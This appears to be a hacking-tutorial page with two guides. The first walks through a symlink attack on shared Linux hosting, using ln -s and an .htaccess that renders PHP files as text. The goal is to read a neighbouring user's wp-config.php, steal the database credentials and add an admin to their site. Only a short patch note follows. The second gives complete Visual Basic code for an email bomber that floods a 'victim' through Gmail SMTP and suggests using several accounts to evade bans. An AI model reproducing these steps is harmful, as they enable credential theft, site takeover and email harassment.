what is symlink

                               what is symlink

Symlink is basically a linux function that allow you to make shortcut (reference) to another file or directory. In linux servers (shared hostings) there are many users in site and they divide hosting space in different

parts. okay if you see with hackers eye.. how will they use it for evil purpose ??

well when a hacker hacks into a website and shell it and get full access to that particular website and its user 

he can only make change in specific disc space that is granted to that particular user. He have no access to other user's space 

but he can use this function to read sensitive files i.e database configuration files. 

example : me and You have websites on a same server you have installed a wordpress cms on your website

we are on same server but We can Try Symlinking your wordpress config file and 

can get details of your database user,password and  can login in mysql server easily. 

suppose your website directory is

/home/target/public_html/

 and mine is

/home/Cyber-Warriors/public_html/

and wordpress has default config file here ===> /public_html/wp-config.php

and it includes your database information 

okay now but question is how I gonna Get your database information in that file when I just cant access your disc space?

we can try symlink so what can i do is

execute this command:

ln -s /home/target/public_html

(but execute this command in some new folder because we also gonna write some htaccess configuration code that will allow us to read all files in .txt format)

now we will see another folder created in same directory where we executed code but still we cant access it

we need to add a configuration files that will tell the server how to open this:

------------------------------------------------------

Options all

DirectoryIndex Sux.html

AddType textplain .log

AddType textplain .php

AddType textplain .conf

AddType textplain .sql

AddHandler server-parsed .php

AddHandler txt .html

Require None

Satisfy Any

------------------------------------------------------

what will this code do ? this will treat all .log, php, conf, sql files as plain text .

okay now you can access target user directory by using this

http://yourwebsite/yourfolder/symlinkdir/

you will see all files of your target directory , now just read config file and get database user

 and password and login in mysql server

with his account and can add new admin to his website from there

                                       how can you patch this ??

we can change permissions of ln for non root users by issuing command

chmod 760 /bin/ln  or we can change php.ini file of main server and disable proc_open and symlink function from there.

How to make an email Bomber

                      How to make an email Bomber

What you will need

1. Microsoft Visual Basic 2010
You Can Download Microsoft Visual Basic 2010  Download!!
So let's Start
1:Open up Visual Basic 2008
2:Create a New Windows Form Application and name it anything you want for example I have named it Cyber-Bomb Then Click OK.
3:Click the window that looks like a new window. Go to the settings on the right scroll down to the bottom until you find
Text. edit this To What you want to appear on the top of your application for Example I Have Called Mine Cyber-Bomb
4:Now it is time for you too design and make the Application. Add 3 Buttons named Start-Stop and Exit You Can Change
The Names By Clicking them and then start typing.
5:Now Add 5 Text-boxes Named
(5.1):Google-mail Username
(5.2):Google-mail password
(5.3):Victims Email
(5.4).Email subject
(5.5).Email message (Make the 5th Text-Box multiline)
6:Now Add One timer.(Do NOT edit anything in this)
7:Add A Label click it and type the Number 0 . ?
8:If you have followed It so far accurately It should look something like this.
9:OK. We have now done the fun bit designing. Now it is time to code it all so it will all work.
10:Double Click The start button and type in
Code:
Timer1start()
11:Double Click The Stop button and type in
Code:
Timer1.stop()
12:Double Click The Exit button and type in
Code:
End
13:Go right to the top of the coding page and above ?Public Class? Type in
Code:
Imports System.Net.Mail
14)If you have followed it correctly so far it should look something like this
15)Now Double click the Timer and type in
Code:
Dim MyMailMessage As New MailMessage()
MyMailMessage.From = New MailAddress(TextBox1.Text)
MyMailMessage.To.Add(TextBox3.Text)
MyMailMessage.Subject = (TextBox4.Text)
MyMailMessage.Body = TextBox5.Text
Dim SMTPServer As New SmtpClient("smtp.gmail.com")
SMTPServer.Port = 587
SMTPServer.Credentials = New System.Net.NetworkCredential(TextBox1.Text, TextBox2.Text)
SMTPServer.EnableSsl = True
Label1.Text = Val(Label1.Text + 1)
SMTPServer.Send(MyMailMessage)
16)Now once you have done that.
17)Now Press F5 or click the green Arrow on the top toolbar to Debug and run/test.
18)This only works with googlemail as it uses there SMTP Server. This is nothing special hwo ever it does send mass
emails to the victim and google does banna ccounts that are caught spamming like this so you may be required to make
a fair few accounts.
20)This is very basic as you can see but you can mess around with styles and jazz it up a bit for your liking.